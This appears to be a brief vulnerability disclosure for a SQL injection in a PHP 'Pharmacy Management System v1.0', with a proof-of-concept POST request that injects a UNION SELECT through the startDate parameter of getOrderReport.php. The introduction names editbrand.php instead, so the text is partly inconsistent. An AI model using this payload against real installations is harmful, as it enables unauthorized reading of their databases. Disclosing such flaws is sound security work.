Introduction
There is a SQL Injection in editbrand.php in Pharmacy Management System v1.0.
I put all the php files to the web root path, so I use /php_action/getOrderReport.php, or it can also be placed at /dawapharma/dawapharma/php_action/getOrderReport.php etc.
POC
the “10.3.34-MariaDB-0+deb10ul” is the database version I use, so it is a SQL injection that can echo the content.
POC:
POST /php_action/getOrderReport.php HTTP/1.1
...
startDate=1' union select 1,2,3,4,5,6,7,8,9,0,version(),12,13,14,15,16,17,18;--+
Vulnerability Analysis
in the php_action/getOrderReport.php, the logic as follows:
the wabpage use the startDate parameter as part of sql statement directly.